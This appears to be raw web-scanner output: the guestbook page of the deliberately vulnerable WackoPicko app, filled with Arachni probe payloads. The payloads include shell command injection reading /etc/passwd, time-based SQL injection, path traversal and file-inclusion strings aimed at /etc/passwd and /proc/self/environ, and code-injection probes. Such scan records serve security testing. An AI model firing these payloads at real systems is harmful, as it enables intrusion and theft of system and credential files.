X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
<p> - by arachni_name </p>
<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
<p> - by arachni_name </p>
<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
<p> - by arachni_name </p>
<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
<p> - by arachni_name </p>
<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p> - by arachni_name </p>
<p class="comment">Hi, I love your site!</p>
<p> - by adam </p>
<form action="/WackoPicko/guestbook.php" method="POST">
Name: <br>
<input type="text" name="name" /><br>
Comment: <br>
<textarea id="comment-box" name="comment"></textarea> <br>
<input type="submit" value="Submit" />
</form>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696 697 698 699 700 701 702 703 704 705 706 707 708 709 710 711 712 713 714 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759 760 761 762 763 764 765 766 767 768 769 770 771 772 773 774 775 776 777 778 779 780 781 782 783 784 785 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 813 814 815 816 817 818 819 820 821 822 823 824 825 826 827 828 829 830 831 832 833 834 835 836 837 838 839 840 841 842 843 844 845 846 847 848 849 850 851 852 853 854 855 856 857 858 859 860 861 862 863 864 865 866 867 868 869 870 871 872 873 874 875 876 877 878 879 880 881 882 883 884 885 886 887 888 889 890 891 892 893 894 895 896 897 898 899 900 901 902 903 904 905 906 907 908 909 910 911 912 913 914 915 916 917 918 919 920 921 922 923 924 925 926 927 928 929 930 931 932 933 934 935 936 937 938 939 940 941 942 943 944 945 946 947 948 949 950 951 952 953 954 955 956 957 958 959 960 961 962 963 964 965 966 967 968 969 970 971 972 973 974 975 976 977 978 979 980 981 982 983 984 985 986 987 988 989 990 991 992 993 994 995 996 997 998 999 1000 1001 1002 1003 1004 1005 1006 1007 1008 1009 1010 1011 1012 1013 1014 1015 1016 1017 1018 1019 1020 1021 1022 1023 1024 1025 1026 1027 1028 | <html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login"> <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;"> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Guestbook</h2> <h4>See what people are saying about us!</h4> <p class="comment">1</p> <p> - by " | /bin/cat /etc/passwd | " </p> <p class="comment">" ; /bin/cat /etc/passwd ; "</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by | /bin/cat /etc/passwd | </p> <p class="comment">1</p> <p> - by ; /bin/cat /etc/passwd ; </p> <p class="comment">` /bin/cat /etc/passwd`</p> <p> - by arachni_name </p> <p class="comment">" && /bin/cat /etc/passwd && "</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ' && /bin/cat /etc/passwd && ' </p> <p class="comment">1</p> <p> - by " ; /bin/cat /etc/passwd ; " </p> <p class="comment">" | /bin/cat /etc/passwd | "</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ' | /bin/cat /etc/passwd | ' </p> <p class="comment">1</p> <p> - by " && /bin/cat /etc/passwd && " </p> <p class="comment">1</p> <p> - by ` /bin/cat /etc/passwd` </p> <p class="comment">' | /bin/cat /etc/passwd | '</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";print 28763*4196403# </p> <p class="comment">print 28763*4196403;</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ';print 28763*4196403# </p> <p class="comment">';print 28763*4196403#</p> <p> - by arachni_name </p> <p class="comment">print 28763*4196403</p> <p> - by arachni_name </p> <p class="comment">;print 28763*4196403</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by print 28763*4196403 </p> <p class="comment">/search.php.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by print 28763*4196403; </p> <p class="comment">1</p> <p> - by ;print 28763*4196403 </p> <p class="comment">1</p> <p> - by arachni_name';.") </p> <p class="comment">1</p> <p> - by arachni_name';waitfor delay '0:0:4'-- </p> <p class="comment">1</p> <p> - by arachni_name' where sleep(4) # </p> <p class="comment">1</p> <p> - by ";print 28763*4196403;# </p> <p class="comment">;print 28763*4196403;</p> <p> - by arachni_name </p> <p class="comment">";print 28763*4196403;#</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ;print 28763*4196403; </p> <p class="comment">1</p> <p> - by ';print 28763*4196403;# </p> <p class="comment">";print 28763*4196403#</p> <p> - by arachni_name </p> <p class="comment">';print 28763*4196403;#</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /search.php. </p> <p class="comment">1</p> <p> - by /bin/cat /etc/passwd </p> <p class="comment">1</p> <p> - by && /bin/cat /etc/passwd && </p> <p class="comment">1</p> <p> - by /WackoPicko/pictures/search.php. </p> <p class="comment">' ; /bin/cat /etc/passwd ; '</p> <p> - by arachni_name </p> <p class="comment">' && /bin/cat /etc/passwd && '</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ' ; /bin/cat /etc/passwd ; ' </p> <p class="comment"> ; /bin/cat /etc/passwd ; </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /pictures/search.php </p> <p class="comment">/bin/cat /etc/passwd</p> <p> - by arachni_name </p> <p class="comment"> && /bin/cat /etc/passwd && </p> <p> - by arachni_name </p> <p class="comment">/pictures/search.php.</p> <p> - by arachni_name </p> <p class="comment">/WackoPicko/pictures/search.php.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /pictures/search.php. </p> <p class="comment">/pictures/search.php</p> <p> - by arachni_name </p> <p class="comment">/WackoPicko/pictures/search.php</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /search.php </p> <p class="comment">1</p> <p> - by /WackoPicko/pictures/search.php </p> <p class="comment"> | /bin/cat /etc/passwd | </p> <p> - by arachni_name </p> <p class="comment">/search.php</p> <p> - by arachni_name </p> <p class="comment">1'=sleep(4)='</p> <p> - by arachni_name </p> <p class="comment">1;waitfor delay '0:0:4'-- </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name');select pg_sleep(4); -- </p> <p class="comment">1;select pg_sleep(4); -- </p> <p> - by arachni_name </p> <p class="comment">1);waitfor delay '0:0:4'-- </p> <p> - by arachni_name </p> <p class="comment">1');waitfor delay '0:0:4'-- </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name));select pg_sleep(4); -- </p> <p class="comment">1" or sleep(4) # </p> <p> - by arachni_name </p> <p class="comment">1';select pg_sleep(4); -- </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name;waitfor delay '0:0:4'-- </p> <p class="comment">1</p> <p> - by arachni_name'=sleep(4)=' </p> <p class="comment">1"=sleep(4)="</p> <p> - by arachni_name </p> <p class="comment">1'));select pg_sleep(4); -- </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name'));select pg_sleep(4); -- </p> <p class="comment">1</p> <p> - by arachni_name"=sleep(4)=" </p> <p class="comment">1</p> <p> - by arachni_name';select pg_sleep(4); -- </p> <p class="comment">1</p> <p> - by arachni_name);waitfor delay '0:0:4'-- </p> <p class="comment">1</p> <p> - by arachni_name));waitfor delay '0:0:4'-- </p> <p class="comment">1';.")</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name");waitfor delay '0:0:4'-- </p> <p class="comment">1"));waitfor delay '0:0:4'-- </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name);select pg_sleep(4); -- </p> <p class="comment">1';waitfor delay '0:0:4'-- </p> <p> - by arachni_name </p> <p class="comment">1' and sleep(4) # </p> <p> - by arachni_name </p> <p class="comment">1");waitfor delay '0:0:4'-- </p> <p> - by arachni_name </p> <p class="comment">1";waitfor delay '0:0:4'-- </p> <p> - by arachni_name </p> <p class="comment">1'));waitfor delay '0:0:4'-- </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name"));waitfor delay '0:0:4'-- </p> <p class="comment">1</p> <p> - by arachni_name'));waitfor delay '0:0:4'-- </p> <p class="comment">1</p> <p> - by arachni_name";waitfor delay '0:0:4'-- </p> <p class="comment">1</p> <p> - by arachni_name');waitfor delay '0:0:4'-- </p> <p class="comment">1));select pg_sleep(4); -- </p> <p> - by arachni_name </p> <p class="comment">1));waitfor delay '0:0:4'-- </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name' or sleep(4) # </p> <p class="comment">1</p> <p> - by arachni_name" and sleep(4)=" </p> <p class="comment">1' or sleep(4) # </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name or sleep(4) # </p> <p class="comment">1</p> <p> - by arachni_name' and sleep(4) # </p> <p class="comment">1</p> <p> - by arachni_name' and sleep(4)=' </p> <p class="comment">1' and sleep(4)='</p> <p> - by arachni_name </p> <p class="comment">1 or sleep(4) # </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name" or sleep(4) # </p> <p class="comment">1" and sleep(4)="</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by arachni_name and sleep(4) </p> <p class="comment">1</p> <p> - by arachni_name;select pg_sleep(4); -- </p> <p class="comment">1');select pg_sleep(4); -- </p> <p> - by arachni_name </p> <p class="comment">1' where sleep(4) # </p> <p> - by arachni_name </p> <p class="comment">1);select pg_sleep(4); -- </p> <p> - by arachni_name </p> <p class="comment">1 and sleep(4)</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../../..//etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../../../..//etc/passwd </p> <p class="comment">file:///../../../../../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../../../../../..//etc/passwd </p> <p class="comment">/../../../../../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../../../../..//etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../../../..//etc/passwd. </p> <p class="comment">1</p> <p> - by file:///../../../../../../../../..//etc/passwd. </p> <p class="comment">1</p> <p> - by file:///../../../../../../..//etc/passwd. </p> <p class="comment">/../../../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">/../../../../../../..//etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../../..//etc/passwd </p> <p class="comment">1</p> <p> - by /../../../../../..//etc/passwd </p> <p class="comment">1</p> <p> - by /../../../../../../..//etc/passwd. </p> <p class="comment">/../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../..//etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../..//etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../..//etc/passwd. </p> <p class="comment">/../../../../../..//etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">file:///../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">/../../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">/../../../../..//etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../..//etc/passwd. </p> <p class="comment">1</p> <p> - by file:///../../../..//etc/passwd </p> <p class="comment">1</p> <p> - by file:///../../../../..//etc/passwd </p> <p class="comment">1</p> <p> - by file:///../../../../../..//etc/passwd. </p> <p class="comment">file:///../../../..//etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../../../../..//etc/passwd </p> <p class="comment">1</p> <p> - by /../../../..//etc/passwd. </p> <p class="comment">/../../../../../../../../..//etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../../../../..//etc/passwd </p> <p class="comment">/../../../../../../../..//etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../..//etc/passwd </p> <p class="comment">file:///../../../../../../../..//etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../..//etc/passwd </p> <p class="comment">1</p> <p> - by /../../../../../../../../..//etc/passwd. </p> <p class="comment">1</p> <p> - by /../../../../..//etc/passwd. </p> <p class="comment">1</p> <p> - by file:///../../../../../../..//etc/passwd </p> <p class="comment">1</p> <p> - by /../../../../../../../..//etc/passwd. </p> <p class="comment">1</p> <p> - by /../../../../../..//etc/passwd. </p> <p class="comment">/../../../../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../../../../../../..//etc/passwd </p> <p class="comment">1</p> <p> - by file:///..//etc/passwd </p> <p class="comment">1</p> <p> - by file:///../../..//etc/passwd </p> <p class="comment">1</p> <p> - by file:///../../..//etc/passwd. </p> <p class="comment">file:///../../..//etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../..//etc/passwd </p> <p class="comment">/../../..//etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../..//etc/passwd. </p> <p class="comment">/../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../../../../../../..//proc/self/environ. </p> <p class="comment">1</p> <p> - by /../..//etc/passwd. </p> <p class="comment">1</p> <p> - by file:///../..//etc/passwd </p> <p class="comment">/../../../../../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">file:///../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">/../..//etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">/../../../..//etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">/../../../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../..//etc/passwd </p> <p class="comment">file:///../..//etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">file:///../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../../../../..//proc/self/environ. </p> <p class="comment">1</p> <p> - by file:///..//etc/passwd. </p> <p class="comment">/..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /..//etc/passwd. </p> <p class="comment">file:///..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../../../../..//proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../..//proc/self/environ. </p> <p class="comment">file:///../../../..//proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../..//proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../..//proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../..//proc/self/environ. </p> <p class="comment">1</p> <p> - by /../../../../../..//proc/self/environ. </p> <p class="comment">1</p> <p> - by /../../../../../..//proc/self/environ </p> <p class="comment">1</p> <p> - by file:///../../../../..//proc/self/environ </p> <p class="comment">/../../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../../..//proc/self/environ </p> <p class="comment">file:///../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../../..//proc/self/environ. </p> <p class="comment">file:///../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">/../..//proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../..//proc/self/environ </p> <p class="comment">/../../../../..//proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../..//proc/self/environ. </p> <p class="comment">1</p> <p> - by file:///../../..//proc/self/environ </p> <p class="comment">1</p> <p> - by file:///../../../..//proc/self/environ </p> <p class="comment">file:///../../..//proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../..//proc/self/environ. </p> <p class="comment">/../../..//proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../..//proc/self/environ </p> <p class="comment">1</p> <p> - by /../..//proc/self/environ. </p> <p class="comment">1</p> <p> - by file:///../../../..//proc/self/environ. </p> <p class="comment">file:///../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">/../../../../../..//proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../..//proc/self/environ. </p> <p class="comment">file:///../../../../../../..//proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../../../..//proc/self/environ </p> <p class="comment">1</p> <p> - by file:///../../../../../..//proc/self/environ </p> <p class="comment">/../../../../../../..//proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">/../../../../../../../../..//proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../../../../..//proc/self/environ </p> <p class="comment">file:///..//etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">/../..//etc/passwd</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /..//etc/passwd </p> <p class="comment">1</p> <p> - by file:///../..//etc/passwd. </p> <p class="comment">1</p> <p> - by /../../../../../../../../..//proc/self/environ </p> <p class="comment">1</p> <p> - by /../../../../../../..//proc/self/environ </p> <p class="comment">/../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../../../../..//proc/self/environ. </p> <p class="comment">/../../../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../../../..//proc/self/environ. </p> <p class="comment">file:///../../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">/../../../../../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../../../../../..//proc/self/environ. </p> <p class="comment">/../../../..//proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../../..//proc/self/environ. </p> <p class="comment">/../../../../../../../..//proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">file:///../../../../../../../..//proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../../../../../../..//proc/self/environ </p> <p class="comment">1</p> <p> - by /../../../../../../../..//proc/self/environ </p> <p class="comment">/..//etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../../..//proc/self/environ. </p> <p class="comment">/../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///../..//proc/self/environ </p> <p class="comment">1</p> <p> - by file:///..//proc/self/environ. </p> <p class="comment">/../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">/..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">" ; sleep 4 ; "</p> <p> - by arachni_name </p> <p class="comment">` sleep 4`</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by " ; sleep 4 ; " </p> <p class="comment">1</p> <p> - by file:///..//proc/self/environ </p> <p class="comment">file:///..//proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">file:///../..//proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">/..//proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">/../../../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /../../..//proc/self/environ </p> <p class="comment">file:///../..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /..//proc/self/environ </p> <p class="comment">1</p> <p> - by /..//proc/self/environ. </p> <p class="comment">file:///..//proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ;import time;time.sleep(4000/1000); </p> <p class="comment">";sleep(4000/1000);#</p> <p> - by arachni_name </p> <p class="comment">file:///proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">;sleep(4000/1000);</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";sleep(4000/1000);# </p> <p class="comment">1</p> <p> - by php://input </p> <p class="comment">1</p> <p> - by ';sleep(4000/1000);# </p> <p class="comment"> import time;time.sleep(4000/1000);</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by import time;time.sleep(4000/1000); </p> <p class="comment">;import time;time.sleep(4000/1000);</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///proc/self/environ. </p> <p class="comment">";import time;time.sleep(4000/1000);#</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by php://input. </p> <p class="comment">1</p> <p> - by ';import time;time.sleep(4000/1000);# </p> <p class="comment">php://input.</p> <p> - by arachni_name </p> <p class="comment"> sleep(4000/1000);</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///etc/passwd. </p> <p class="comment">/proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">file:///etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by file:///etc/passwd </p> <p class="comment">1</p> <p> - by /etc/passwd </p> <p class="comment">file:///etc/passwd</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /proc/self/environ </p> <p class="comment">file:///proc/self/environ.</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by /etc/passwd. </p> <p class="comment">1</p> <p> - by /proc/self/environ. </p> <p class="comment">/proc/self/environ</p> <p> - by arachni_name </p> <p class="comment">/etc/passwd.</p> <p> - by arachni_name </p> <p class="comment">php://input</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ;sleep(4000/1000); </p> <p class="comment">';sleep(4000/1000);#</p> <p> - by arachni_name </p> <p class="comment">/etc/passwd</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ` sleep 4` </p> <p class="comment">' | sleep 4 | '</p> <p> - by arachni_name </p> <p class="comment"> ; sleep 4 ; </p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by & sleep 4 & </p> <p class="comment">' & sleep 4 & '</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ; sleep 4 ; </p> <p class="comment">' ; sleep 4 ; '</p> <p> - by arachni_name </p> <p class="comment">1</p> <p> - by ";import time;time.sleep(4000/1000);# </p> <p class="comment">1</p> <p> - by " && sleep 4 && " </p> <p class="comment">1</p> <p> - by " & sleep 4 & " </p> <p class="comment">" & sleep 4 & "</p> <p> - by arachni_name </p> <p class="comment">1</p> 